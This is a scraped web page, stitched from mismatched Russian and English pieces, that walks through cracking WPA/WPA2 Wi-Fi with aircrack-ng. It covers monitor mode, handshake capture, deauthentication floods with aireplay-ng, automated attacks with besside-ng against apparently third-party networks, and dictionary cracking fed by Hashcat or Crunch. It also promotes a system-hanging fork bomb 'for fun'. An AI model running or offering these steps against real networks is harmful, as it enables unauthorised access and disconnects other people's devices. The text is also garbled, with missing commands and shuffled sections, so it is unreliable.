Содержание
- 1 Airodump-ng: Authentication Handshake
- 2 Using Hashcat generated passwords in Aircrack-ng
- 3 Hacking Wi-Fi in Aircrack-ng with Crunch-generated passwords on the fly
- 4 Примеры запуска Besside-ng
- 5 Fragmentation Versus Chopchop
- 6 Как пользоваться Aircrack-ng для взлома WPA
- 7 Requirements
- 8 Airmon-ng: Monitor Mode
- 9 10 ответов
- 10 Как будет работать атака на WPA/WPA2?
- 11 Optional stuff
- 12 Airodump-ng Package Description
- 13 Aircrack-ng: Download and Install
- 14 Подбор пароля Wi-Fi утилитой aircrack-ng
Airodump-ng: Authentication Handshake
Cool Tip: Want to have some “fun”? Create a Linux fork bomb! One small string that is able to hang the whole system! Read more →
Now, when our wireless adapter is in monitor mode, we have a capability to see all the wireless traffic that passes by in the air.
This can be done with the command:
$ sudo airodump-ng mon0
All of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen:
CH 1 ][ 2014-05-29 12:46 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:11:22:33:44:55 -48 212 1536 66 1 54e WPA2 CCMP PSK CrackMe 66:77:88:99:00:11 -64 134 345 34 1 54e WPA2 CCMP PSK SomeAP BSSID STATION PWR Rate Lost Frames Probe 00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -44 0 - 1 114 56 00:11:22:33:44:55 GG:HH:II:JJ:KK:LL -78 0 - 1 0 1 66:77:88:99:00:11 MM:NN:OO:PP:QQ:RR -78 2 - 32 0 1
Start the on AP channel with the filter for BSSID to collect the authentication handshake for the access point we are interested in:
$ sudo airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w WPAcrack mon0 --ignore-negative-one
Option | Description |
---|---|
The channel for the wireless network | |
The MAC address of the access point | |
The file name prefix for the file which will contain authentication handshake | |
The wireless interface | |
Fixes the ‘fixed channel : -1’ error message |
If you want to speed up this process – go to the step #4 and try to force wireless client reauthentication.
After some time you should see the in the top right-hand corner of the screen.
This means that the has successfully captured the handshake:
CH 1 ][ 2014-05-29 12:46 WPA handshake: 00:11:22:33:44:55 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:11:22:33:44:55 -48 212 1536 66 1 54e WPA2 CCMP PSK CrackMe BSSID STATION PWR Rate Lost Frames Probe 00:11:22:33:44:55 AA:BB:CC:DD:EE:FF -44 0 - 1 114 56
Using Hashcat generated passwords in Aircrack-ng
In order not to crack passwords, but only to show candidates, Hashcat has an option —stdout
We also need to specify the hacking mode (option -a) and the mask itself.
# | Mode ===+====== 0 | Straight 1 | Combination 3 | Brute-force 6 | Hybrid Wordlist + Mask 7 | Hybrid Mask + Wordlist - - ? | Charset ===+========= l | abcdefghijklmnopqrstuvwxyz u | ABCDEFGHIJKLMNOPQRSTUVWXYZ d | 0123456789 h | 0123456789abcdef H | 0123456789ABCDEF s | !"#$%&'()*+,-./:;<=>?@^_`{|}~ a | ?l?u?d?s b | 0x00 - 0xff
As a result, the command to display passwords looks like this:
hashcat --stdout -a 3 pattaya?l?l?l?l
Where:
- —stdout means only show passwords candidates.
- -a 3 means that mask attack is selected
- pattaya?l?l?l?l is the mask itself. All passwords created at the beginning of the word will have pattaya, and then there will be four small letters. It is recommended that you familiarize yourself with the rules for creating masks for Hashcat: https://en.kali.tools/?p=155
The command to transfer generated passwords from hashcat to aircrack-ng for my data looks like this:
hashcat --stdout -a 3 pattaya?l?l?l?l | aircrack-ng -w - -e dlink dlink-02.cap
Hacking Wi-Fi in Aircrack-ng with Crunch-generated passwords on the fly
Crunch is a dictionary generator with passwords in which you can define a standard or specified encoding. Crunch can create a list of words with all sorts of combinations and permutations in accordance with specified criteria. The data that crunch prints can be displayed on the screen, saved to a file, or transferred to another program.
A simple example of use:
crunch <minimum-length> <maximum-length>
In general, Crunch is a very flexible program, and in order to use it 100% you need to study its options and familiarize yourself with the examples. You can find various examples of crunch usage on the page: https://en.kali.tools/?p=182
For my case it would be possible to do this:
crunch 11 11 -t pattaya@@@@ | aircrack-ng -w - -e dlink dlink-02.cap
Or so:
crunch 11 11 -t @@@@@@@@@@@ | aircrack-ng -w - -e dlink dlink-02.cap
Примеры запуска Besside-ng
Переводим беспроводную карту (wlan0) в режим монитора:
root@HackWare:~# ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up
Запускаем besside-ng на интерфейсе wlan0:
root@HackWare:~# besside-ng wlan0 Let's ride Logging to besside.log TO-OWN OWNED [] Got necessary WPA handshake info for Kitty Run aircrack on wpa.cap for WPA key Pwned network Kitty in 0:02 mins:sec TO-OWN OWNED Crappy connection - num unreachable got 0/10 (100% loss) Got necessary WPA handshake info for Mial Run aircrack on wpa.cap for WPA key Pwned network Mial in 0:01 mins:sec TO-OWN OWNED Crappy connection - Hailsham unreachable got 0/10 (100% loss) TO-OWN OWNED TO-OWN OWNED TO-OWN OWNED TO-OWN OWNED TO-OWN OWNED TO-OWN OWNED Got necessary WPA handshake info for DANIELLE2015 Run aircrack on wpa.cap for WPA key Pwned network DANIELLE2015 in 4:50 mins:sec TO-OWN OWNED TO-OWN OWNED TO-OWN OWNED TO-OWN OWNED TO-OWN OWNED TO-OWN OWNED TO-OWN OWNED / Attacking WPA - DEAUTH (know 3 clients) …........................................
Содержимое лог файла (besside.log):
# SSID | KEY | BSSID | MAC filter Kitty | Got WPA handshake | 4c:72:b9:fe:b8:0c | DANIELLE2015 | Got WPA handshake | 0c:54:a5:c0:24:d6 | Mial | Got WPA handshake | 20:25:64:16:58:8c |
Fragmentation Versus Chopchop
Fragmentation:
- Pros
-
— Can obtain the full packet length of 1500 bytes XOR. This means you can subsequently pretty well create any size of packet.
— May work where chopchop does not
— Is extremely fast. It yields the XOR stream extremely quickly when successful. - Cons
-
— Setup to execute the attack is more subject to the device drivers. For example, Atheros does not generate the correct packets unless the wireless card is set
to the mac address you are spoofing.
— You need to be physically closer to the access point since if any packets are lost then the attack fails.
Chopchop
- Pro
-
— May work where frag does not work.
- Cons
-
— Cannot be used against every access point.
— The maximum XOR bits is limited to the length of the packet you chopchop against.
— Much slower then the fragmentation attack.
Как пользоваться Aircrack-ng для взлома WPA
Дальше рассмотрим как пользоваться aircrack-ng. Если программа еще не установлена на вашем компьютере, то в Linux вы можете скачать ее из официальных репозиториев. В Ubuntu:
sudo apt install aircrack-ng
А в Red Hat / CentOS:
sudo yum install aircrack-ng
Windows вам придется загрузить установщик из официального сайта. После установки первым делом нужно сделать чтобы нам ничего не мешало. Для этого отключите все сервисы, которые управляют Wifi и тем более отключитесь от Wifi сети, если вы к ней подключены. Если запущен NetworkManager, его нужно отключить:
sudo systemctl stop NetworkManager
Я предполагаю, что у вас уже установлены все необходимые драйвера и вы готовы к работе. Сначала смотрим подключенные к системе интерфейсы:
sudo ls /sys/class/net/
Обычно имя беспроводного интерфейса начинается на w, например, wlp3s0 или wlan0. У меня это wlp3s0b1. Нам нужно перевести сетевой интерфейс WiFi в режим мониторинга. В этом режиме он может захватывать все пакеты, которые летают в сети и даже если ему они не адресованы ему. Вообще, интерфейс и так захватывает все пакеты, но на программном уровне все пакеты, которые не адресованы этому компьютеру отсеиваются, теперь они не будут отсеиваться. Дальше идет инструкция Aircrack-ng.
Для этого воспользуемся утилитой airmon-ng. Ей нужно передать команду start и имя интерфейса:
sudo airmon-ng start wlp0s0b1
После этого будет создан виртуальный интерфейс, который работает в режиме монитора во второй колонке отображено его имя, у меня это wlp3s0b1mon, хотя часто он называется просто mon0. Если какие-либо программы будут мешать программа выдаст их имена и PID:
Их нужно завершить с помощью kill. Дальше нам нужно просканировать эфир и найти нашу сеть, которую мы собираемся тестировать. Для этого используйте команду airodump-ng. В параметрах ей нужно передать только интерфейс
Обратите внимание, что нужно передавать именно виртуальный интерфейс, который работает в режиме монитора:
sudo airodump-ng -i wlp3s0b1mon
Почти сразу же вы увидите свою сеть, поскольку она расположена ближе всех. У меня это MyPublicWifi423. Из предоставляемой информации нам понадобится ее BSSID и канал, который можно найти в колонке CH. Дальше мы будем использовать ту же самую утилиту, только теперь нацелим ее именно на нашу сеть, чтобы она не отвлекалась на посторонние и поймала все что нам нужно.
Мы зададим канал с помощью опции -с и BSSID роутера с помощью опции —bssid, а также укажем с помощью опции -w куда нужно сохранить перехваченные пакеты для дальнейшей обработки:
sudo airodump-ng -c 11 –bssid 56:0A:64:17:5D:33 -w /home/sergiy/hack.pcap wlp3s0b1mon
Не закрывайте этот терминал, сейчас выполняется захват и как вы можете видеть к нашей сети подключено два пользователя. Их MAC адреса находятся в колонке STATION. Если сейчас один из них отключится и еще раз подключится, то мы получим необходимые для дальнейшего взлома данные.
Мы можем это сделать со своими устройствами, но в реальной сети у хакера не будет такой возможности, поэтому мы можем принудительно отключить клиента от сети с помощью утилиты aireplay. Если передать ей опцию deauth, то она разошлет широковещательное сообщение от имени маршрутизатора, в котором попросит всех отключиться от сети. Нам нужно только передать в параметрах количество пакетов, которые нужно отправить и BSSID роутера:
sudo aireplay-ng –deauth 10 -a 56:0A:64:17:5D:33 wlp3s0b1mon
Сразу после этого вы сразу же увидите, сообщение WPA handshake: 56:0A:64:17:5D:33 в правом верхнем углу терминала. Вы можете использовать и более простой способ для получения Handshake. Утилита besside позволяет выполнить все действия автоматически нужно только передать BSSID роутера и интерфейс монитора:
sudo besside-ng -b 02:C2:C6:46:39:85 wlp3s0b1mon
Этап, связанный с работой в реальной сети завершен и нам осталось только перебрать все возможные пароли по словарю. Дальше рассмотрим как пользоваться Aircrack-ng для перебора паролей.
Словарь — это обычный текстовый документ со списком возможных паролей. Вы можете составить его сами. Команда будет выглядеть следующим образом:
$ sudo aircrack-ng -b BSSID_маршрутизатора -w путь_к_словарю перехваченные_пакеты
sudo aircrack-ng –bssid 56:0A:64:17:5D:33 -w /home/sergiy/words /home/sergiy/hack.pcap-01.cap
Дальше начнется перебор ключей и если ключ, который использовался для защиты сети есть в списке, то он обязательно будет найден:
Поэтому никогда не используйте простые пароли, состоящие только из цифр, если вы добавите хоть одну букву или символ, то уменьшите шансы на взлом в несколько раз.
необходимо зарегистрироваться, для того что бы оставить комментарий
Requirements
- Autoconf
- Automake
- Libtool
- shtool
- OpenSSL development package or libgcrypt development package.
- Airmon-ng (Linux) requires ethtool, usbutils, and often pciutils.
- On windows, cygwin has to be used and it also requires w32api package.
- On Windows, if using clang, libiconv and libiconv-devel
- Linux: LibNetlink 1 or 3. It can be disabled by passing —disable-libnl to configure.
- pkg-config (pkgconf on FreeBSD)
- FreeBSD, OpenBSD, NetBSD, Solaris and OS X with macports: gmake
- Linux/Cygwin: make and Standard C++ Library development package (Debian: libstdc++-dev)
Note: Airmon-ng only requires pciutils if the system has a PCI/PCIe bus and it is populated.
Such bus can be present even if not physically visible. For example, it is present,
and populated on the Raspberry Pi 4, therefore pciutils is required on that device.
Airmon-ng: Monitor Mode
Monitor mode allows a computer with a wireless network interface to monitor all traffic received from the wireless network.
What is especially important for us – monitor mode allows packets to be captured without having to associate with an access point.
Find and stop all the processes that use the wireless interface and may cause troubles:
$ sudo airmon-ng check kill
Start the wireless interface in monitor mode:
$ sudo airmon-ng start wlan0 Interface Chipset Driver wlan0 Intel 6235 iwlwifi - (monitor mode enabled on mon0)
In the example above the has created a new wireless interface called and enabled on it monitor mode.
So the correct interface name to use in the next parts of this tutorial is the .
10 ответов
12
Вы можете установить его с помощью brew
Или используя порт
6
После многих разочарований в этой же проблеме я нашел способ фактически использовать Airodump на моем терминале Mac. Я понял, что все файлы, которые я могу успешно выполнить, находятся в пути к каталогу
/usr /local /bin /
И получается, что Airodump был на самом деле на моем компьютере, он просто был сохранен в пути
/USR /местные /SBIN
И я не смог выполнить его с этого пути. Все, что я сделал, это переместить Airodump из пути /usr /local /sbin в путь /usr /local /bin, и теперь он отлично работает! Я сошел с ума в течение нескольких часов, и это было так просто.
3
Вы можете легко установить с помощью homebrew
Do
Тогда do
для установки или обновления airodump-ng
2
Поскольку у меня нет работающего linix-бокса, в настоящее время я не в курсе возможностей aircrack-ng
KisMac — более старый порт Kismet, последний выпущенный в 2006 году, но сообщил о работе над Snow Leopard. Не пробовал.
Другим возможным полезным инструментом является WireShark. Вам нужно будет установить XQuartz, чтобы использовать его, так как это приложение для Windows X11.
Последняя возможность — установить окна под VirtualBox, Parallels или VMFusion и предоставить им полный доступ к вашим сетевым картам.
Основываясь на пояснении в вашем комментарии, я думаю, что wirehark будет делать то, что вы хотите, если хотите посмотреть трафик.
Если вы просто хотите считать пакеты, вы можете использовать netstat. Это терминальная программа.
(см. man netstat)
-w10 дает вам запись каждые 10 секунд. Если вам нужны почасовые записи, вы должны использовать -w3600.
Netstat — это общее назначение. Если у вас несколько интерфейсов, вы можете отфильтровать данный флаг с -I. Вы также можете выполнять фильтрацию по протоколу, семейству адресов.
Если вам нужна серьезная фильтрация (я хочу знать, сколько пакетов bitorrent отправлено в пиратский отсек на прошлой неделе), вам понадобится либо wirehark, либо tcpdump. (Tcpdump — это командная строка) Wireshark — это в основном графический интерфейс поверх tcpdump. Оба имеют свое место.
1
Я использую aircrack-ng на своем mac, от терминала, не подражая другой ОС. Вот хорошая страница, в которой упоминается отношение к другим инструментам, которые, я думаю, могут вам помочь: http://easymactips.blogspot.com/2010/10/how-to-install-aircrack-on-mac.html
Кстати, может быть, у вас уже есть в системе то, что вы ищете: скрытый в вашем аэропорту, от yosemite on, сниффер. Нажмите опцию и значок Wi-Fi, вы увидите опцию беспроводной диагностики. Команда 4 сканирует (вы видите сети, каналы, MAC-адреса и другие данные), а команда 6 — сниффер. Дайте тоже попробовать. С наилучшими пожеланиями.
1
Обратите внимание, что команда также будет захватывать пакеты в файл, чтобы можно было просто использовать аэропорт для захвата, а затем открыть файл в Wireshark или просто выйти из команды аэропорта после того, как вы запустили захват режима монитора и позволили Wireshark собрать их, чтобы вы могли видеть их в реальном времени. На самом деле можно изменить канал захвата, пока работает Wireshark, но вы можете пропустить пакеты, пока происходит изменение канала
1
-
Захват беспроводного трафика с помощью :
sudo tshark -i en1 -I -w wlan.pcap
-
Анализ захвата с помощью :
pyrit -r wlan.pcap анализ
Он имеет инструкции по установке aircrack-ng на Mac.
На веб-сайте:
Среди прочего:
- Показывает вход в систему клиентов
- Можно захватить пакеты (возможно экспорт PCAP)
- Показывает скрытые SSID
- Может выполнять различные атаки, такие как «атака деаутентификации»
Они связывают файл zipped в конце файла README: KisMac2.zip .
Как будет работать атака на WPA/WPA2?
Как я уже говорил протокол шифрования беспроводных сетей WPA тоже имеет свои недочеты. Но большинство из них усугубляет именно пользователь. Если не учитывать недавно открытую уязвимость в работе WPA TKIP, то все остальные проблемы возникают из-за слабого пароля.
Для нашей тестовой атаки будем использовать собственную сеть. Предполагается, что вы к ней не подключены. Рассмотрим в чем состоит суть атаки. Для того чтобы подключиться к сети каждый клиент должен пройти процесс аутентификации с роутером. Я не буду вдаваться в подробности, но между клиентом и маршрутизатором выполняются четыре проверки подлинности на основе MAC адреса, ключа и случайных чисел, если мы их перехватим, то сможем уже на локальном компьютере попробовать перебрать подходящий пароль уже на локальном компьютере.
Суть метода в том, что скорость перебора на компьютере будет намного быстрее, чем при ручной проверке, она будет достигать до 1000 паролей в секунду, а при использовании очень простого и ожидаемого пароля, его можно очень быстро перебрать.
Сначала мы переведем устройство в режим монитора с помощью airmon-ng, затем будем перехватывать все пакеты от этой сети с помощью airodump-ng пока не найдем рукопожатие, затем останется перебрать пароль по словарю с помощью aircrack. А теперь перейдем ближе к практике и рассмотрим насколько просто перебрать ваш пароль если он достаточно простой.
Optional stuff
- If you want SSID filtering with regular expression in airodump-ng
(-essid-regex) pcre development package is required. - If you want to use airolib-ng and ‘-r’ option in aircrack-ng,
SQLite development package >= 3.3.17 (3.6.X version or better is recommended) - If you want to use Airpcap, the ‘developer’ directory from the CD/ISO/SDK is required.
- In order to build , , , and ,
libpcap development package is required (on Cygwin, use the Aircap SDK instead; see above) - For best performance on FreeBSD (50-70% more), install gcc5 (or better) via: pkg install gcc9
- rfkill
- If you want Airodump-ng to log GPS coordinates, gpsd is needed
- For best performance on SMP machines, ensure the hwloc library and headers are installed. It is strongly recommended on high core count systems, it may give a serious speed boost
- CMocka for unit testing
- For intergation testing on Linux only: tcpdump, HostAPd, WPA Supplicant and screen
Airodump-ng Package Description
Airodump-ng is included in the aircrack-ng package and is used for packet capturing of raw 802.11 frames. It is ideal for collecting WEP IVs for use with aircrack-ng. If you have a GPS receiver connected to the computer, airodump-ng can log the coordinates of the discovered access points.
- Author: Thomas d’Otreppe, Original work: Christophe Devine
- License: GPLv2
airodump-ng – a wireless packet capture tool for aircrack-ng
root@kali:~# airodump-ng —help
Airodump-ng 1.5.2 — (C) 2006-2018 Thomas d’Otreppe
https://www.aircrack-ng.org
usage: airodump-ng <options> <interface>
Options:
—ivs : Save only captured IVs
—gpsd : Use GPSd
—write <prefix> : Dump file prefix
-w : same as —write
—beacons : Record all beacons in dump file
—update <secs> : Display update delay in seconds
—showack : Prints ack/cts/rts statistics
-h : Hides known stations for —showack
-f <msecs> : Time in ms between hopping channels
—berlin <secs> : Time before removing the AP/client
from the screen when no more packets
are received (Default: 120 seconds)
-r <file> : Read packets from that file
-x <msecs> : Active Scanning Simulation
—manufacturer : Display manufacturer from IEEE OUI list
—uptime : Display AP Uptime from Beacon Timestamp
—wps : Display WPS information (if any)
—output-format
<formats> : Output format. Possible values:
pcap, ivs, csv, gps, kismet, netxml, logcsv
—ignore-negative-one : Removes the message that says
fixed channel <interface>: -1
—write-interval
<seconds> : Output file(s) write interval in seconds
—background <enable> : Override background detection.
Filter options:
—encrypt <suite> : Filter APs by cipher suite
—netmask <netmask> : Filter APs by mask
—bssid <bssid> : Filter APs by BSSID
—essid <essid> : Filter APs by ESSID
—essid-regex <regex> : Filter APs by ESSID using a regular
expression
-a : Filter unassociated clients
By default, airodump-ng hops on 2.4GHz channels.
You can make it capture on other/specific channel(s) by using:
—ht20 : Set channel to HT20 (802.11n)
—ht40- : Set channel to HT40- (802.11n)
—ht40+ : Set channel to HT40+ (802.11n)
—channel <channels> : Capture on specific channels
—band <abg> : Band on which airodump-ng should hop
-C <frequencies> : Uses these frequencies in MHz to hop
—cswitch <method> : Set channel switching method
0 : FIFO (default)
1 : Round Robin
2 : Hop on last
-s : same as —cswitch
—help : Displays this usage screen
airodump-ng Usage Examples
Monitor all wireless networks, frequency hopping between all wireless channels.
root@kali:~# airodump-ng wlan0mon
CH 8 ][ 2018-11-22 13:44
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
54:A0:50:DA:7B:98 -76 1 0 0 1 54e WPA2 CCMP PSK RTINC-24
FC:15:B4:CF:0A:55 -70 2 0 0 6 54e. WPA2 CCMP PSK HP-Print-55-ENVY 4500 series
A8:4E:3F:73:DD:88 -67 3 0 0 6 720 WPA2 CCMP PSK WAT-73DD80
4C:8B:30:83:ED:91 -71 2 0 0 1 54e WPA2 CCMP PSK TELL-US-2.4G
4C:8B:30:D7:09:41 -76 2 0 0 1 54e WPA2 CCMP PSK SAMUELL-2.4G
FA:8F:CA:89:90:39 -82 2 0 0 1 135 OPN Raymond’s TV.e102
AC:20:2E:CD:F4:88 -85 0 0 0 6 54e. WPA2 CCMP PSK BELL-CDF480
10:78:5B:2A:A1:21 -80 2 0 0 6 54e WPA2 CCMP PSK COGECO-2.4G
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 8C:85:90:0C:C5:D0 -44 0 — 1 1 5
(not associated) A0:63:91:43:C2:D5 -70 0 — 1 0 1 TT-D59979
(not associated) 14:91:82:04:D9:74 -43 0 — 1 0 1 1
Sniff on channel 6 (-c 6) via monitor mode interface wlan0mon and save the capture to a file (-w /root/chan6).
root@kali:~# airodump-ng -c 6 -w /root/chan6 wlan0mon
CH 6 ][ 2017-11-12 13:49
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
BC:4D:FB:2C:6D:88 -68 28 9 3 0 6 54e. WPA2 CCMP PSK BELL-CDF4800
A8:4E:3F:73:DD:88 -74 33 19 0 0 6 54e. WPA2 CCMP PSK COGECO-2.4G
FC:15:B4:CF:0A:55 -77 61 31 0 0 6 54e. WPA2 CCMP PSK HP-Print-55-ENVY 4500 series
Filter for access points by a specific manufacturer, specifying the OUI and mask (-d FC:15:B4:00:00:00 -m FF:FF:FF:00:00:00).
root@kali:~# airodump-ng -d FC:15:B4:00:00:00 -m FF:FF:FF:00:00:00 wlan0mon
CH 14 ][ 2018-11-22 13:53
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
FC:15:B4:CF:0A:55 -76 9 0 0 6 54e. WPA2 CCMP PSK HP-Print-55-ENVY 4500 series
BSSID STATION PWR Rate Lost Frames Probe
Aircrack-ng: Download and Install
The Latest Version Only: If you really want to hack WiFi – do not install the old from your OS repositories. Download and compile the latest version manually.
Install the required dependencies:
$ sudo apt-get install build-essential libssl-dev libnl-3-dev pkg-config libnl-genl-3-dev
Download and install the latest ():
$ wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz -O - | tar -xz $ cd aircrack-ng-1.2-rc4 $ sudo make $ sudo make install
Ensure that you have installed the latest version of :
$ aircrack-ng --help Aircrack-ng 1.2 rc4 - (C) 2006-2015 Thomas d'Otreppe http://www.aircrack-ng.org
Подбор пароля Wi-Fi утилитой aircrack-ng
Введение
В начале 1990-х годов, когда Wi-Fi только появился, был создан алгоритм Wired Equivalent Privacy, который должен был обеспечивать конфиденциальность Wi-Fi сетей. Однако, WEP оказался неэффективным алгоритмом защиты, который легко взломать.
На смену пришел новый алгоритм защиты Wi-Fi Protected Access II, который сегодня применяют большинство точек доступа Wi-Fi. WPA2 использует алгоритм шифрования, AES, взломать который крайне сложно.
А где же уязвимость?
Недостаток WPA2 заключается в том, что зашифрованный пароль передается при подключении пользователей во время так называемого 4-way handshake (4-х стороннего рукопожатия). Если мы поймаем handshake, то узнаем зашифрованный пароль и нам останется лишь расшифровать его. Для этой цели мы воспользуемся aircrack-ng.
Шаг 1. Определяем интерфейс
Для начала нужно узнать, какой сетевой интерфейс нам нужен, для этого вводим команду:
В моем случае всего три интерфейса, два из которых не имеют беспроводных расширений (no wireless extensions). Поэтому нас интересует только wlan0.
Шаг 2. Переводим сетевой адаптер в режим мониторинга
Перевод сетевого адаптера в режим мониторинга позволит нам видеть беспроводной трафик, подходящий рядом с нами. Для того чтобы сделать это, вводим команду:
Обратите внимание, что airmon-ng переименовал ваш интерфейс (у меня он стал называться mon0, но вам, все же, стоит проверить)
Шаг 3. Перехватываем трафик
Теперь, когда наш сетевой адаптер находится в режиме мониторинга, мы можем захватить, подходящий мимо нас трафик, используя команду airodump-ng. Вводим:
Обратите внимание, что все видимые точки доступа перечислены в верхней части экрана, а клиенты — в нижней части экрана
Шаг 4. Концентрируем перехват на конкретной точке доступа.
Наш следующий шаг — сосредоточить наши усилия на одной из точек доступа и на ее канале. Нас интересует BSSID и номер канала точки доступа, которую мы будем взламывать. Давайте откроем еще один терминал и введем:
- 08:86:30:74:22:76 BSSID точки доступа
- -c 6 канал на котором работает точка доступа Wi-Fi
- WPAcrack файл в который запишется handshake
- mon0 сетевой адаптер в режиме мониторинга
Как вы можете видеть на скриншоте выше, мы сейчас концентрируемся на захвате данных с одной точки доступа с ESSID Belkin276 на канале 6. Терминал оставляем открытым!
Шаг 5. Получение handshake
Чтобы захватить зашифрованный пароль, нам нужно, чтобы клиент прошел аутентификацию (подключился к Wi-Fi). Если он уже аутентифицирован, мы можем его деаутентифицировать (отключить), тогда система автоматически повторно аутентифицируется (подключится), в результате чего мы можем получить зашифрованный пароль.
То есть нам просто нужно отключить подключенных пользователей, чтобы они подключились снова. Для этого открываем ещё один терминал и вводим:
- 100 количество пользователей, которые будут деаутентифицированы
- 08:86:30:74:22:76 BSSID точки доступа
- mon0 сетевой адаптер
Теперь при повторном подключении окно которое мы оставили на предыдущем шаге поймает handshake. Давайте вернемся к нашему терминалу airodump-ng и посмотрим.
Обратите внимание на верхнюю строку справа, airodump-ng вывел: «Handshake WPA». То есть, мы успешно захватили зашифрованный пароль! Это первый шаг к успеху!
Шаг 6. Подбираем пароль
Теперь, когда у нас есть зашифрованный пароль в нашем файле WPAcrack, мы можем запустить подбор пароля. Но для этого нам нужно иметь список с паролями которые мы хотим использовать. Найти такой список можно за 5 минут в Гугле. Я, же, буду использовать список паролей по умолчанию, включенный в aircrack-ng: BackTrack darkcOde.
Открываем новый терминал и вводим:
- WPAcrack-01.cap файл в который мы записывали handshake (airodump-ng приписал в конце -01.cap)
- /pentest/passwords/wordlist/darkc0de абсолютный путь к списку паролей
Сколько времени это займёт?
Этот процесс может занять много времени. Все зависит от длины вашего списка паролей, вы можете ждать от нескольких минут до нескольких дней. На моем двухъядерном процессоре Intel aircrack-ng подбирает чуть более 800 паролей в секунду.
Когда пароль будет найден, он появится на вашем экране. Будет ли подбор пароля успешным или нет, зависит от вашего списка. Если у вас не получилось подобрать пароль по одному списку, не отчаивайтесь, попробуйте другой.